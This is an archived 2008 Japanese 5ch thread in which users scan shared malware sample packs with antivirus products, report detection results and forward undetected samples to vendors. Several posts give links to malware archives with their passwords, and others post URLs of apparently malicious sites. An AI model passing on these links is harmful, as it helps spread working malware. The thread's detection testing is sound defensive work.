5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【鑑定目的禁止】検出可否報告スレ7

1 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:14:02
@はじめに
各ウイルス対策ソフトの検出可否を独自に調査し報告するスレです。
IDが無いため検出結果を張る際はSSを必ず張ってください。
うpろだはなるべく流れにくいところにしましょう。
特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう

前スレ
【鑑定目的禁止】検出可否報告スレ6
http://pc11.2ch.net/test/read.cgi/sec/1205329452/

A報告用テンプレ
【検体サンプル】>>(検体URLのレス番号)
【ソフト名】
【結果】
【SS】http://

スクリーンショットの貼り付けは任意です。

専用アプロダ推奨↓
http://tane.sakuratan.com/

旧アップローダー(仕様変更で使えなくなったぽいorz)
ttp://www5.uploader.jp/home/tane/

2 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:15:03
B議論や意見のまとめ

・圧縮ファイルと検出数
 exeの中身を検査数に入れるソフト、入れないソフトがあります。ご注意を。

・DOSウイルス禁止
 大昔のウイルスを集めてきても無意味なことがあります。

・パスなしZIPをパス有りLZH(またはRAR)で
 安全性と利便性のため、上記の手法を推奨します。

・淡々とやれ淡々と!
 淡々と貼り、淡々といきましょう。

・ブラクラ禁止
 ブラクラ等、想定しないものを無言で貼らないこと

・ここは検出力調査スレなんだから時間の経った報告は、同時点での検出結果比較の対象にならない
 んなこたーない。時間が経過したときにどれだけ対応数が増えているかも重要。
 という意見もあり。

・スレ違いでもめる(2スレ目以降)

・あらしはスルー。ソフトの優劣の議論は別スレで!

3 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:15:24
【重要】
●ここは鑑定スレではありません。malwareのみお願いします。
割れ厨やネトゲチート厨がここで鑑定させようとすることがありますが、スルーしてください。

●また、このスレは、検出の結果報告およびベンダーへの連絡を通じて、セキュリティの向上
に微力ながら貢献することを目的としているスレです。
検体の悪用・不正利用は厳禁願います。

●検体は、セキュリティ上の観点からなるべく >>1のアップローダを使用してください。

●検体確認は自己責任でお願いします。感染しても責任はもてません!

※◆W32/Vael.oは信頼できるコテさんです。

4 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:16:02
●新種・亜種ウイルスを発見した場合のサンプル提出先
(未検出の場合はとにかく提出しましょう)

シマンテック (ノートン)
Symantec Security Response USA 〔Upload a suspected infected file〕
ttps://submit.symantec.com/websubmit/retail.cgi

ウイルスバスター(トレンドマイクロ) 
http://inet.trendmicro.co.jp/esolution/supform.asp
バスターユーザー以外は
;http://www.trendmicro.com/jp/security/virushunter.htm
http://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7

マカフィー 
http://www.nai.com/japan/security/contactavert.asp

ウイルスセキュリティ(K7Computing) 
http://k7computing.com/faq.htm

ESET NOD32アンチウイルス 
http://www.eset.com/support/ans/9d.htm

V3ウイルスブロック 
http://info.ahnlab.com/customer/virus_call.html

ウイルスドクター 
http://www.virusdoctor.jp/virus/

5 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:16:42
Rising(ウイルスキラー)
http://up.rising.com.cn/webmail/uploadnew.htm
Rising(ウイルスキラー)英語版
ttp://sample.rising-global.com/webmail/upload_en.htm


Dr.WEB 
http://drweb.jp/support/?virus_sample

ソフォス(Sophos) 
http://www.sophos.co.jp/support/queries/#sample

F-Secure 
http://www.f-secure.co.jp/support/samples/

kaspersky(カスペルスキー)
http://www.kaspersky.co.jp/
一番下の「新しいウイルスをお知らせ下さい」

バイロボット(hauri)
http://www.haurijapan.com/support/vreport01.php

キングソフトアンチウィルス
http://www.kingsoft.jp/support/is/kentai.htm

6 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:17:41
BitDefender 
http://www.bitdefender.com/bd/site/contactus.php

Avira AntiVir
ttp://www.avira.com/en/support/submit_suspicious_files.html

ewido(AVG;Anti ;Spyware) 
http://www.ewido.net/en/malware/

AVG 
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.cz/doc/51/jp/crp/0/num/486#faq_486

avast! 
http://www.avast.com/jpn/technical_support.html

eTrust 
http://www.caj.co.jp/support/csp/free_policy/virus.htm

F-PROT;
http://www.f-prot.com/virusinfo/submission_form.html

esafe 
http://www.aladdin.com/home/csrt/vsubmit.asp

a2(a-squared)
http://www.emsisoft.jp/jp/support/submit/

7 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:18:05
Microsoft(マイクロソフト)
ttp://www.microsoft.com/security/portal/submit.aspx

ウイルスセキュリティ(K7Computing) http://k7computing.com/virus_issues.asp#3

ウイルスチェイサー http://www.viruschaser.jp/support_aft.html#q28

8 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:18:52
ーーーーーーーーーーーーーーーーーーーここまでーーーーーーーーーーーーーーーーーー

>>4->>7の検体提出先の変更・追加あれば、指摘よろ。

9 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:31:27
>>1乙 保守

10 :名無しさん@お腹いっぱい。:2008/07/16(水) 23:48:51
>>1乙

11 :名無しさん@お腹いっぱい。:2008/07/17(木) 00:54:54
おつ

12 : ◆W32/Vael.o :2008/07/17(木) 09:26:57
>>1

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=42
Malware-Pack35

13 :名無しさん@お腹いっぱい。:2008/07/17(木) 10:00:51
>>12 乙です。検出外はAVGに送りました。

14 :名無しさん@お腹いっぱい。:2008/07/17(木) 10:12:46
>>12
スマンテックに贈りました

15 :名無しさん@お腹いっぱい。:2008/07/17(木) 10:19:31
バスターに検体提出するときみんなどうやって送ってるの?
まさか郵送なわけないと思うしバスターに送る人はバスターのシリアルナンバー持ってるの?

ところでavast!のチェストからの検体提出機能は便利だね、ここからコメントなしで提出しても対応してくれた。
ESETもせっかくファイル提出機能あるんだから解析チームしっかりしろよ、しかもavast!より簡単に検体提出できるのにこれじゃ宝の持ち腐れじゃねーか!!

16 :名無しさん@お腹いっぱい。:2008/07/17(木) 10:26:04
>>8
Kingsoft Internet Security
http://www.kingsoft.jp/is/kentai.html

17 :名無しさん@お腹いっぱい。:2008/07/17(木) 10:42:58
>>12
マイクロソフト送りました
>>14

18 :名無しさん@お腹いっぱい。:2008/07/17(木) 11:22:45
>>12

トン

カスペ2009 10/12

Detected riskware not-a-virus:FraudTool.Win32.AntiSpySpider.ap Malware/2/antispyspider.msi
Detected riskware not-a-virus:FraudTool.Win32.MalwareProtector.a Malware/5
Detected riskware not-a-virus:FraudTool.Win32.DoctorAntivirus.a Malware/b
Detected Trojan program Backdoor.Win32.VB.dvu Malware/3/Postal-Siempresonrie.exe
Detected Trojan program Backdoor.Win32.IRCBot.djv Malware/4/mixit.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.bio Malware/6/setup_1_506_.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.qri Malware/7/MediaTubeCodec_ver1.446.0.exe
Detected Trojan program Trojan-Spy.Win32.Zbot.crv Malware/8/iiowk.exe
Detected Trojan program Heur.Downloader Malware/a/alteracao.com (ヒューリスティック)
Detected virus Rootkit.Win32.Clbd.cv Malware/9/file.exe

検体提出しました。

19 :18:2008/07/17(木) 15:06:12
カスペからの返事

Hello,

4561.swf - Trojan-Downloader.SWF.Small.cr,
4562.swf - Trojan-Downloader.SWF.Small.cs,
alteracao.com_ - Trojan-Downloader.Win32.Banload.qtk

New malicious software was found in these files.
Detection will be included in the next update. Thank you for your help.

20 :名無しさん@お腹いっぱい。:2008/07/17(木) 21:13:19
http://www.crazyclits.com/?cgi-bin/tm3/120178036.zip

21 :名無しさん@お腹いっぱい。:2008/07/17(木) 23:33:24
K7 Total Security 9.0

7/12

0,1,2,3,5残り

22 :名無しさん@お腹いっぱい。:2008/07/17(木) 23:44:46
>>20
avast!

VBS:Malware-gen

23 :名無しさん@お腹いっぱい。:2008/07/18(金) 03:49:15
>>20
AVG Internetsecurity8.0のWebシールドとサーフシールドが反応しまくり。

24 :名無しさん@お腹いっぱい。:2008/07/18(金) 12:54:38
こないだPandaに初めて検体提出したけど一日で対応してくれた。
あまりの対応の速さに驚いたけどPandaってこんなに対応速いの?
でもスルーしてるウイルス多いし第三者機関でもテスト結果がしょぼいか参加しないことばかり。
Pandaってわけわからん。

25 :名無しさん@お腹いっぱい。:2008/07/18(金) 13:36:13
初回ってとこがポイントかも知れん

26 :名無しさん@お腹いっぱい。:2008/07/18(金) 16:50:00
最近、Symantecも日本時間が対応速くなってる

27 :名無しさん@お腹いっぱい。:2008/07/18(金) 17:22:27
Symantecもやる気出さないとAntiVir、カスペ、AVG、Bitに置いてけぼりにされるからな。
マカフィーの復活はないのかな・・・
あそこはESET並みに酷い。

28 :名無しさん@お腹いっぱい。:2008/07/18(金) 19:10:39
いやSymantecは中国シェアからして実力はあるよ
中国で米製がネームバリューで売れるわけないからね

29 :名無しさん@お腹いっぱい。:2008/07/18(金) 20:17:33
>>20
まずは火狐3が反応して警告画面
あえて無視するとAvira反応
Contains recognition pattern of the HTML/Dldr.Age.48568 HTML script virus

30 :名無しさん@お腹いっぱい。:2008/07/18(金) 20:50:48
>>20
http://www.virustotal.com/analisis/049036e1bd6d9a2e4d8b4558a7c44059

やられたorz

31 :名無しさん@お腹いっぱい。:2008/07/18(金) 21:11:27
>>15
バスターは >>4 の下のほう。
ちなみにaspがエラーでコケたらそれは対応済み。

32 :名無しさん@お腹いっぱい。:2008/07/19(土) 00:08:12
>>30
>>20自体がSQLインジェクションで改ざんされているということか?
できれば、>>1のあぷろだにあげてほしい。(´・ω・`)ショボーン

33 :名無しさん@お腹いっぱい。:2008/07/19(土) 06:30:55
>>32
ttp://www5.uploader.jp/dl/tane/tane_uljp00051.zip.html
解凍パス:infected
DLパス:Virus

34 :名無しさん@お腹いっぱい。:2008/07/19(土) 12:10:05
>>33
それは昔からある奴で、Windows Updateが最新なら感染しないよ?

35 :名無しさん@お腹いっぱい。:2008/07/19(土) 13:11:52
flash経由で感染するものがでてるらしい。yourfilehostで感染者確認。

36 :名無しさん@お腹いっぱい。:2008/07/19(土) 13:25:06
flashの脆弱性なら前からありますけど

37 :名無しさん@お腹いっぱい。:2008/07/19(土) 13:25:25
陳腐化済

38 :名無しさん@お腹いっぱい。:2008/07/19(土) 14:24:17
>>33
http://www.virustotal.com/jp/analisis/049036e1bd6d9a2e4d8b4558a7c44059

39 :名無しさん@お腹いっぱい。:2008/07/19(土) 20:31:35
>>33
カスペ2009

Detected Trojan program Trojan-Clicker.HTML.IFrame.km tane_uljp00051.zip/crazyclits.htm

VTとは違うな。08/3/2作成検体

40 :名無しさん@お腹いっぱい。:2008/07/19(土) 20:50:38
>>39
逆にマイクロソフトは無反応 何でだろう

41 :名無しさん@お腹いっぱい。:2008/07/19(土) 22:54:03
とりあえず>>20の詳細
http://www.siteadvisor.com/sites/crazyclits.com?ref=safe&client_ver=FF_26.6_6270&locale=ja-JP&premium=false&client_type=FF&aff_id=0
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://www.crazyclits.com/?cgi-bin/tm3/120178036.zip

火狐3って結構優秀?
Trendプロテクト+Webレピュテーションと比較してみたいけどあいにくその環境が整ってないんだよな・・・

42 :名無しさん@お腹いっぱい。:2008/07/20(日) 00:15:29
検体集めてたら感染したから画像上げと着ますね
http://tane.sakuratan.com/upload/src/tane0044.jpg

43 :名無しさん@お腹いっぱい。:2008/07/20(日) 00:17:21
IEで検体集めは危険だからやめとけ

44 :名無しさん@お腹いっぱい。:2008/07/20(日) 00:19:46
みんな検体集めするときは砂箱使ってるの?
こちらではAntiVirPremium+Comodo+FireFox3+サイトアドバイザだけどこれじゃ頼りないかな?

45 :42:2008/07/20(日) 00:23:48
感染PCから検体採取中。なかなかAVで反応しないのが手に入るからいいね。

46 :名無しさん@お腹いっぱい。:2008/07/20(日) 00:32:30
http://blog20fc2.com/linelink/index.htm
ここにtestfileが多数うpされてるよ。

47 :名無しさん@お腹いっぱい。:2008/07/20(日) 02:26:54
>>46
火狐が怒ってるんですけど・・・

48 :名無しさん@お腹いっぱい。:2008/07/21(月) 15:26:20
>>6
AVG 
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.cz/doc/51/jp/crp/0/num/486#faq_486

AVGユーザーの方、
検体提出方法について教えて下さい

49 :名無しさん@お腹いっぱい。:2008/07/21(月) 15:41:36
>>48
メールでいいんじゃね?
ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

50 :名無しさん@お腹いっぱい。:2008/07/22(火) 00:28:11
>>8
AVGはFAQのアドレスが変わってる
http://www.grisoft.com/jp.faq.num-771#faq_771

51 :名無しさん@お腹いっぱい。:2008/07/22(火) 01:51:59
>>5訂正

Rising(ウイルスキラー)
http://up.rising.com.cn/webmail/uploadnew.htm
Rising(ウイルスキラー)英語版
ttp://sample.rising-global.com/webmail/upload_en.htm


Dr.WEB 
http://drweb.jp/support/?virus_sample

ソフォス(Sophos) 
http://www.sophos.co.jp/support/queries/#sample

F-Secure 
http://www.f-secure.co.jp/support/samples/

kaspersky(カスペルスキー)
http://www.kaspersky.co.jp/
一番下の「新しいウイルスをお知らせ下さい」

バイロボット(hauri)
http://www.haurijapan.com/support/vreport01.php

キングソフトアンチウィルス
http://www.kingsoft.jp/is/kentai.html

52 :名無しさん@お腹いっぱい。:2008/07/22(火) 01:53:50
>>6訂正 >>50

BitDefender 
http://www.bitdefender.com/bd/site/contactus.php

Avira AntiVir
ttp://www.avira.com/en/support/submit_suspicious_files.html

ewido(AVG;Anti ;Spyware) 
http://www.ewido.net/en/malware/

AVG 
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.com/jp.faq.num-771#faq_771

avast! 
http://www.avast.com/jpn/technical_support.html

eTrust 
http://www.caj.co.jp/support/csp/free_policy/virus.htm

F-PROT;
http://www.f-prot.com/virusinfo/submission_form.html

esafe 
http://www.aladdin.com/home/csrt/vsubmit.asp

a2(a-squared)
http://www.emsisoft.jp/jp/support/submit/

53 :名無しさん@お腹いっぱい。:2008/07/22(火) 07:41:10
ブラクラを混ぜるな

54 :名無しさん@お腹いっぱい。:2008/07/23(水) 14:00:20
ttp://turismosustentavelbrasil.org.br/index1.php

55 :名無しさん@お腹いっぱい。:2008/07/23(水) 18:17:36
ttp://www.virustotal.com/analisis/d1cd055fcd28569487f3534d18a364c7

ベンダーが35に増えてなにがあるんだろうと思ったらバイロボットとPCToolsかよ。
この二つマジイラネ

56 : ◆W32/Vael.o :2008/07/24(木) 09:35:13
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=45
Malware-Pack36

57 :名無しさん@お腹いっぱい。:2008/07/24(木) 09:52:27
>>55
出だしの挙動があやしくても、その後成長して定番の一角に認められるものもある
生暖かい目で見守ってやろうぜ

58 :名無しさん@お腹いっぱい。:2008/07/24(木) 14:28:43
    + 。 *   ワクワクテカテカ  +
ツヤツヤ  ∧_∧  +
 +   _(u☆∀☆) ギトギトヌルヌル           バイロボット
  ⊂ (0゚ ∪ ∪。⊃ +                 PCTools
⊂ ゚̄ と_u _)__)゚  ̄⊃ + ワクワクキラキラ
  ⊂_。+   ゚+_⊃
    ⊂__⊃.  +  * +   ワクテカ  +


59 :名無しさん@お腹いっぱい。:2008/07/24(木) 14:42:18
>>56


カスぺ2009(12:05:00)
4/12

Detected riskware not-a-virus:Downloader.Win32.Antivirus2009.a Malware/1/AV2009Install_0011.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vaod Malware/6/setup_525_18_.exe
Detected Trojan program Backdoor.Win32.Delf.jwh Malware/9/cliecker5.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.rbc Malware/a/OiFotos_102772.exe

検体提出します。

60 :名無しさん@お腹いっぱい。:2008/07/24(木) 16:01:50
>>56 AVG送付済み

61 :名無しさん@お腹いっぱい。:2008/07/24(木) 21:34:42
>56
K7 Total Security 9.0
2/12

1 not-a-virus:Downloader.Win32.Antivirus2009.a
6 Trojan-Downloader.Win32.FraudLoad.vaod

62 :名無しさん@お腹いっぱい。:2008/07/24(木) 21:47:33
>>56乙です
マイクロソフト未対応9個の検体送りました

63 :名無しさん@お腹いっぱい。:2008/07/24(木) 22:12:19
>>56
NIS2008で5/12
未検出は贈っておきました

64 :名無しさん@お腹いっぱい。:2008/07/24(木) 22:26:29
「勝手にウイルステスト」のサイトで紹介されたアドウェア
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=46
Pass:Adware

avast!、AVG、カスペには提出しました。

65 :名無しさん@お腹いっぱい。:2008/07/24(木) 22:28:17
ちなみに64は火狐3でダウンロードしようとした弊害だったのかファイルが完全にダウンロードできなかったorz
一応AntiVirでスパイウェア反応するけど(当然フリーでは検出できない)

66 :名無しさん@お腹いっぱい。:2008/07/24(木) 23:10:25
NOD32
ウイルス定義データベース: 3295 (20080724)

>56
 2/12+エラー1
Malware\0\AntiVirusInstallFree_en.exe - Win32/Adware.AVSystemCare アプリケーション
Malware\1\AV2009Install_0011.exe - Win32/Adware.XPAntivirus アプリケーション

Malware\7\AntivirusXP2008Installer.exe > NSIS > ァ.exe - アーカイブの読み込み時にエラーが発生しました

>64
1/1
\unp161252899.tmp - Win32/Adware.180Solutions アプリケーション

ついでに
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=43

5/8
080718\AdultChannel.exe - Win32/PSW.VB.QX トロイの木馬
080718\app.exe - Win32/Agentの亜種である可能性 トロイの木馬
080718\EroAnimePlayer.exe - Win32/PSW.VB.SJ トロイの木馬
080718\HyperErectCollection.exe - Win32/PSW.VB.RJ トロイの木馬
080718\MovieTubes.exe - Win32/PSW.VB.QY トロイの木馬

67 :名無しさん@お腹いっぱい。:2008/07/24(木) 23:17:08
>>64
ttp://www.virustotal.com/analisis/8a62ccc8ef11915c0b8eee7bdff7f1b1

68 :名無しさん@お腹いっぱい。:2008/07/24(木) 23:29:33
ウイルスバスター2008
>>56
Mal_Banker -> OiFotos_102772.exe

>>64
ADW_SEEKMO

検出しなかったものは提出

69 :strange:2008/07/25(金) 16:21:27
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=47
dlパス    zipパス
strange / malware

70 :名無しさん@お腹いっぱい。:2008/07/25(金) 17:30:23
>>56
乙です
ClamWin Ver.0.93.1
2/12

\Malware\7\AntivirusXP2008Installer.exe: Trojan.Peed.IG FOUND
\Malware\a\OiFotos_102772.exe: Trojan.Banload.OSL FOUND

71 :69:2008/07/25(金) 17:49:05
追加
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=48

パスは上に同じ。
>>69>>42の感染源のファイル(pdfファイル)とその他関連ファイルとネットで集めたもの。
で、これはZlob系ので適当に関連ファイル詰め合わせ。(感染源のファイルはsetup.exe)
http://www5.uploader.jp/user/tane/images/tane_uljp00053.jpg

72 :名無しさん@お腹いっぱい。:2008/07/25(金) 19:18:43
>>64のカスペとAVGの返事
カスペ
Hello,

unp161252899.tmp_ - not-a-virus:WebToolbar.Win32.Zango.am

This file is already detected by our extended bases as a potentially risk program.

Please quote all when answering.


AVG

Dear Sir/Madam,

thank you for your email.

Unfortunately the password "virus" did not match for the archive.
Please send us the correct password or new archive with the infected file.

Thank you for your cooperation.

うん?AVGはパスワードが間違ってて解析できなかったのか?(英語力足りなくてスマソ)
でもカスペはしっかりと解析できてるし・・・(提出したファイルとパスは同じなんだけどな)

謎だ・・・

73 :名無しさん@お腹いっぱい。:2008/07/25(金) 19:59:11
NOD32 ウイルス定義データベースのバージョン: 3298 (20080725)
47(>>69)
3/11
Virus47\288888.exe - Win32/PSW.Legendmir.SY トロイの木馬
Virus47\lphc3f8j0eaaa.exe - Win32/Adware.XPAntivirus アプリケーション
Virus47\mm.exe - Win32/Genetikの亜種である可能性 トロイの木馬

48(>>71)
14/16
C:\Documents and Settings\a\デスクトップ\48\ASCWarning32.dll - Win32/Adware.AntiSpyCheck アプリケーション
C:\Documents and Settings\a\デスクトップ\48\iebr.dll - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebt.dll - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtmm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\lla2.exe - Win32/TrojanDownloader.FakeAlert.EY トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\SetCertAcl.exe - Win32/Adware.NetPumper アプリケーション
C:\Documents and Settings\a\デスクトップ\48\setup.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\ubpr01.exe - Win32/BHO.NFX トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcs.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬

74 :名無しさん@お腹いっぱい。:2008/07/25(金) 20:52:22
http://www1.axfc.net/uploader/He/so/123260
pass:abc

75 :名無しさん@お腹いっぱい。:2008/07/25(金) 21:22:11
kaspersky7
7/25 18:01:51

>>69  1/11
Trojan-Downloader.Win32.Agent.wbq ファイル: tane0047.zip/Virus/mm.exe//NSPack//#//PE_Patch//UPack

>>71  4/16
Hoax.Win32.Renos.vapi ファイル: tane0048.zip/lla2.exe
not-a-virus:AdWare.Win32.E404.fv ファイル: tane0048.zip/ubpr01.exe//PE_Patch.UPX//UPX
not-a-virus:FraudTool.Win32.AntiSpyCheck.l ファイル: tane0048.zip/ASCWarning32.dll
Trojan-Downloader.Win32.Zlob.swn ファイル: tane0048.zip/setup.exe

76 :名無しさん@お腹いっぱい。:2008/07/25(金) 22:31:40
Rising Antivirus 20.54.41
>>33>>56>>64>>71
スルー
>>12
スルーだったけど最近3だけ検出
Postal-Siempresonrie.exe: Backdoor.Win32.VB.eng
>>69
288888.exe: Trojan.DL.Win32.Small.djk
efds.html: Trojan.DL.VBS.Agent.coj
mm.exe>>nspack: Dropper.Win32.ExplorerDL.g

77 :名無しさん@お腹いっぱい。:2008/07/26(土) 00:50:37
K7 Total Security 9.0

>69 2/11
Virus,288888.exe,Infected by Trojan-Downloader.Win32.Anskya.New,Cleaned ,
Virus,lphc3f8j0eaaa.exe,Infected by Trojan.Win32.Renos.ACB,Cleaned ,

>71 1/16
virus48,ASCWarning32.dll,Infected by not-a-virus:FraudTool.Win32.AntiSpyCheck.l,Cleaned ,

>74 5/5

78 :名無しさん@お腹いっぱい。:2008/07/26(土) 03:13:42
ウイルスバスター2008
>>69
TROJ_Generic -> 288888.exe
Mal_Hifrm-2 -> letter.htm
TROJ_RENOS.ACB -> lphc3f8j0eaaa.exe

>>71
全スルー

検出しなかったものは提出しました

79 :名無しさん@お腹いっぱい。:2008/07/29(火) 14:13:19
>>56,69,71
カスペからの返事仮まとめ

Hello,

123.htm_ - Trojan-Downloader.JS.Iframe.od,
efds.htm_ - Trojan-Downloader.JS.Agent.cjc,
letter.htm_ - Trojan-Clicker.HTML.IFrame.tr,
setup_1_1.exe_ - Trojan-Downloader.Win32.FraudLoad.vasd
lphc3f8j0eaaa.exe_ - Trojan-Downloader.Win32.Small.zge

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

288888.exe_, class.ezpdf.php.exe_, locate.dll, msserv.config, nstaller.exe_, SetCertAcl.exe_, test.htm_, uxeSetup.exe_
AntiVirusInstallFree_en.exe ,0_engracado00.com,r0x.exe, ftp.exe

No malicious code were found in these files.

VRM_Free.exe_ - not-a-virus:FraudTool.Win32.VirusRemover.a

New potentially risk software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab.


80 :名無しさん@お腹いっぱい。:2008/07/29(火) 14:49:01
>>69,71
AVG提出しました。
>>74AVG全部撃破!

81 :名無しさん@お腹いっぱい。:2008/07/31(木) 13:38:31
ttp://1st-tube.com/viewmovie.php

avast!とAVGは検出、AntiVirは検出しませんでした。

82 :名無しさん@お腹いっぱい。:2008/07/31(木) 14:40:56
DLパス:malware
解凍:insukoman
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=50
>>42と同じ症状がでる感染元のファイル2つとZlob
両方ともMBAMで大方処理可能。


83 :名無しさん@お腹いっぱい。:2008/07/31(木) 21:21:47
kaspersky AV7.0 
2008/7/31 3:56:36

17/29(31)

84 :名無しさん@お腹いっぱい。:2008/07/31(木) 21:30:04
DLパス:virus
解凍:infected
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=51

85 :84:2008/07/31(木) 21:36:13
GrisoftとAviraには提出済です。

86 :名無しさん@お腹いっぱい。:2008/07/31(木) 22:01:27
Rising Antivirus 20.55.32
>>82
dflgh8jkd2q2.exe, xpupdate.exe: Worm.Mail.Win32.Zhelatin.wsw
get_flash_update.exe: Trojan.Win32.Undef.jzk
mrofinu27.exe>>upx_c: Trojan.DL.Win32.Mnless.ahw
vedxg6ame4.exe>>65: Trojan.Win32.Undef.jro
vedxga3me2.exe: Trojan.Win32.Undef.jqt
>>81>>84
スルー

残りはRisingに提出済み

87 :名無しさん@お腹いっぱい。:2008/07/31(木) 23:00:25
d
カスペ2009 21:07:00

>>81
24個
Detected Trojan program Trojan.Win32.Buzus.ocu tane0050\kentai\geehnkkp.exe
Detected Trojan program Trojan-Downloader.Win32.Exchanger.hk tane0050\kentai\get_flash_update.exe
Detected Trojan program Trojan-Downloader.Win32.Homles.bz tane0050\kentai\mrofinu27.exe
Detected Trojan program Trojan-Downloader.Win32.BHO.oo tane0050\kentai\nod32.dll
Detected Trojan program Trojan.Win32.Shutdowner.em tane0050\kentai\rsyncini.exe
Detected Trojan program Trojan-Proxy.Win32.Small.uh tane0050\kentai\services.exe
Detected Trojan program Trojan.Win32.Pakes.jxx tane0050\kentai\setup_10054_509_.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkk tane0050\kentai\vedxg6ame4.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.wlz tane0050\kentai\vedxga3me2.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkj tane0050\kentai\vedxga4m1et4.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkj tane0050\kentai\vedxga4me1.exe
Detected Trojan program Trojan-Downloader.Win32.Mutant.aim tane0050\kentai\Winls74.sys
Detected Trojan program Trojan.Win32.Pakes.jwi tane0050\kentai\wpx26.cpx
Detected virus Email-Worm.Win32.Zhelatin.afj tane0050\kentai\glok+7836-655e.sys
Detected virus Email-Worm.Win32.Zhelatin.afg tane0050\kentai\vedxg4am1et2.exe

以下、パッカー検知
Detected Trojan program Packed.Win32.Tibs.kn
dflgh8jkd2q1.exe,dflgh8jkd2q2.exe,dflgh8jkd2q5.exe,dflgh8jkd2q6.exe
dflgh8jkd2q7.exe, sysohqt.exe ,syswafb.exe ,xpupdate.exe ,vedxga1me4t1.exe


>>84
スルー

検体提出します。

88 :名無しさん@お腹いっぱい。:2008/07/31(木) 23:56:52
K7 Total Security 9.0
>>82
6/29

>>84
0/2

89 :名無しさん@お腹いっぱい。:2008/08/01(金) 14:41:09
McAfee
>>82
9個検出

>>84
1個検出


90 :名無しさん@お腹いっぱい。:2008/08/01(金) 15:11:42
やはりK7は格が違った

91 :名無しさん@お腹いっぱい。:2008/08/01(金) 16:41:37
ウイルスバスター2008
>>82
JS_SILLY.IS -> 1.htm
WORM_NUCRP.GEN -> asc3550p.sys
TROJ_NUWAR.DDJ -> back.exe.exe
TROJ_RENOS.ADE -> dflgh8jkd2q2.exe
TROJ_EXCHANGER.U -> get_flash_update.exe
TROJ_DLOADER.PER -> mrofinu27.exe
TROJ_SHUTDOWN.AN -> rsyncini.exe
TROJ_NUWAR.DDJ -> vedxg4am1et2.exe
TROJ_DROPPER.IBT -> vedxg6ame4.exe
TROJ_DLOADER.SVL -> vedxga3me2.exe
TROJ_PAKES.ATE -> wpx26.cpx
TROJ_RENOS.ADE -> xpupdate.exe

>>84
スルー
検出しなかったものは検体として提出

92 :名無しさん@お腹いっぱい。:2008/08/01(金) 21:38:31
VirusTotalにソースネクストウイルスセキュリティ降臨!!
その恐るべき(低い)実力がついに晒される…

VirusTotal += K7 Including the engine from K7 Computing
ttp://blog.hispasec.com/virustotal/34

93 :名無しさん@お腹いっぱい。:2008/08/01(金) 21:47:40
K7AntiVirus の行だな

94 :名無しさん@お腹いっぱい。:2008/08/01(金) 21:55:33
>>92
なんという羞恥プレイ・・・ゴクリ

95 :名無しさん@お腹いっぱい。:2008/08/01(金) 22:16:58
●hnLabあたりといい勝負しそうだ

96 :名無しさん@お腹いっぱい。:2008/08/01(金) 23:35:07
恥を忍ぶのと引き換えに、検体情報がもらえるわけで
どうなっていくかな

なんだかんだで、優秀になってくれれば言うことないわけで
量販店いくたび、あれがあの価格のまま、もっと賢くなってくれればと思いつつ横目にいつも見てる

97 :名無しさん@お腹いっぱい。:2008/08/01(金) 23:42:36
>>95
ネトゲトロイがそれなりに集まるAhnLabとじゃ勝負にならんでしょ。
ウイルスプロテクター(Hauri ViRobot)と底辺争いかと。

98 :名無しさん@お腹いっぱい。:2008/08/01(金) 23:44:33
